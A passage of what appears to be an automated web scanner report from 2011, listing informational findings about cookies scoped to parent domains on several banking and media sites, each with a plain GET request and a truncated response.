Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=bYx6oMVfj9kBcCnXRIC7QuWJObofc+Jaq1A5qqoNbP0HE17ytE7Cx6dx0Vbp+Q/E4cPLbF/R9fXTivraTbY10kYDMjDKAxqQRqieQ3mRWgd2QAy2Nyutp7h3RsSMRpGoNb7B4AMxcb4mjelZGvPbqRcR5jGg43CsqRiqk18bI142IGn7nOxKkbOigS1lSoeHsoGaDP9pQTGT5HUtMuiOkt9S5BP4o+t3WUZsSIFeoBg9qKr8E2yq31e2xZVOVmCr9ZS17eAH1TH3qjerMtqmLqHOZH41tqHJZx+Hq1fpVIOXyYbhvoo/Lp9isRNY2sWPpisgLr18HAg3XN9sDFyPAOQ//piYBQLzGAyi1vKQGdsV5+R/lUCvf/q8L6l7W9bnrWRRa9AWjB2+tWtePdOU7eeQpBO/4AcZ/BPW3/7SC9Hz+gHejvNiOsyC6XZQu5pZ/jH7Wm3fQd4+XTCa7boPBGXKXHSNFdtZLNQl1ayww21G2zokvCUEM5aE0VB/wk9zbEUeYA2eFXBYaLJ5DtrW4BUNtwvskBAFPrrqc//mU/6S950OeuWSXE6D82+AeUSOiMVuRyuVEsdx75ZV4zf5G6KdlZxf+ne5+yzcTKPPGFXKjEsnshCBE3NPmGygmWqO; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=bb8b1b67ca344027b65d9c9f791d0fa5; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

10.139. http://www.totalmerrill.com/TotalMerrill/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalmerrill.com
Path:   /TotalMerrill/pages/home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TotalMerrill/pages/home.aspx HTTP/1.1
Host: www.totalmerrill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 35056
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=s4zK1Ge0SqHHKynqb5orE0Zg/uL5gCQTwxLXpewRGggd8mTC6BRKDQCPNMy7S/rW8VNz6DQ76MbLuVeBKTGxYNHytG/9FzIC1SYscEp1Q/b38ha7WH9vuzLsjNLGrPr5NHXxPZya/2xPDgSIV9Ssr8Xw5DcLTEltSPoYTT2vjfsX/YxXl/koPBWTMrO2TrvFxqPEeNKecZaEIhFSugfB49w5BNbxtfGtMDpg3KkGxd7Tz0kWBXThtNCZU8jF0hkKb8ZyuZSX4X+yy/nSuSUuBJosuozhqMOvoRmuO935NMIjQ3apZkCKYRrFP8ba/9CYsnkIWtVrM1VBkgtTGi7mwY7A67FmQIqDgxk1IUn0TJR/ywq6V2DnENEdjPA5fM6+ItTKWl31Nh+hdNm7UY6XxvFc8suP4pjrRsyrgQKLZcKZu7VYBxl02Fvt5bW+pAp5SvL6St36bHn2duMcQEp2cFDczofvDrgxfMsXGrQaOVR5AO6R3RgABndj4xf/hlubUaSNLF/FQ/Exy0c4umYjC6fh2RTzf5DWl6WRS80UKNBJ7bQIu0Zbg34A/U1aK1YDqeiWnItrkmu3Eg14KLSxi9s5VNseNm3+A6WrAlzToIViSrXpDiglowddSci7pIYw; path=/; domain=.totalmerrill.com
X-AspNet-Version: 2.0.50727
Set-Cookie: TM_PUID=5497c089-72bd-4056-993e-a48a686537cf; domain=.TotalMerrill.com; expires=Tue, 02-Feb-2021 22:20:28 GMT; path=/
Date: Wed, 02 Feb 2011 22:20:29 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

10.140. http://www.viglink.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 23:45:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/
Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/
Vary: Accept-Encoding
Connection: Close
Content-Length: 14626

<!doctype html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>Affiliate Every Link on the Web with VigLink</title>

<meta http-equiv="Content-type" content="text/h
...[SNIP]...

10.141. http://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wachovia.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wachovia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:00:05 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C; Path=/; Domain=.wachovia.com
Location: https://www.wachovia.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 233

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.wachovia.co
...[SNIP]...

10.142. http://www.wcti12.com/news/26551757/detail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcti12.com
Path:   /news/26551757/detail.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/26551757/detail.html HTTP/1.1
Host: www.wcti12.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 45691
Content-Type: text/html
Set-Cookie: alpha=35ce8f186d5f00002e024a4d32200c00e6bc0100; expires=Sun, 31-Jan-2021 01:17:34 GMT; path=/; domain=.wcti12.com
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
X-Flow: xslt-in-production
Cache-Control: max-age=596
Expires: Thu, 03 Feb 2011 01:27:30 GMT
Date: Thu, 03 Feb 2011 01:17:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="no-js">
<head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

10.143. http://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:54 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Location: https://www.wellsfargo.com/


10.144. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:00:58 GMT
Content-type: text/html;charset=UTF-8
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: JSESSIONID=A063DC75E80493714CD441148D97EDA0;Path=/;Secure
Set-cookie: wfacookie=B-201102021400581302177828;Domain=.wellsfargo.com;Expires=Sat, 30-Jan-2021 22:00:58 GMT;Path=/
Set-cookie: OB_SO_ORIGIN=source%3Dhomepage;Domain=.wellsfargo.com;Path=/
Set-cookie: WFHOME=PER;Domain=.wellsfargo.com;Expires=Sat, 01-Feb-2014 22:00:58 GMT;Path=/
Content-Length: 19011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head
...[SNIP]...

10.145. https://www.wellsfargo.com/about/diversity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /about/diversity/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>About Wells Fargo - Diversity
...[SNIP]...

10.146. https://www.wellsfargo.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Auto Loans ... Wells F
...[SNIP]...

10.147. https://www.wellsfargo.com/autoloans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /autoloans/apply

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autoloans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 301 Moved Permanently
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:49 GMT
Content-length: 15
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010
Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close


                                   

10.148. https://www.wellsfargo.com/browser/jaws_setting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /browser/jaws_setting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.149. https://www.wellsfargo.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Careers</t
...[SNIP]...

10.150. https://www.wellsfargo.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /checking/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Checking Account - Compa
...[SNIP]...

10.151. https://www.wellsfargo.com/com/comintro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /com/comintro

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /com/comintro HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:25 GMT
Location: https://www.wellsfargo.com/com/
Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/com/">h
...[SNIP]...

10.152. https://www.wellsfargo.com/credit_cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Credit Cards
...[SNIP]...

10.153. https://www.wellsfargo.com/credit_cards/select_card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /credit_cards/select_card

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit_cards/select_card HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Location: https://www.wellsfargo.com/credit_cards/
Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/credit_
...[SNIP]...

10.154. https://www.wellsfargo.com/equity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2TyTNJhY3JchnGmJ4bFhFZNhrNjKnLLw809GTQGsf17zgJWCnCyt!-530822505; domain=.wellsfargo.com; path=/; secure
Set-Cookie: msc=5572; domain=.wellsfargo.com; expires=Friday, 04-Mar-2011 22:29:44 GMT; path=/
Set-Cookie: ISD_WCM_COOKIE=2129943306.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Home Equity Loans & Li
...[SNIP]...

10.155. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /equity/rate_payments/information/rate_calc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /equity/rate_payments/information/rate_calc HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Location: https://www.wellsfargo.com/equity/tools/rate_calc
Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/equity/
...[SNIP]...

10.156. https://www.wellsfargo.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Customer Service f
...[SNIP]...

10.157. https://www.wellsfargo.com/help/faqs/signon_faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /help/faqs/signon_faqs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/faqs/signon_faqs HTTP/1.1
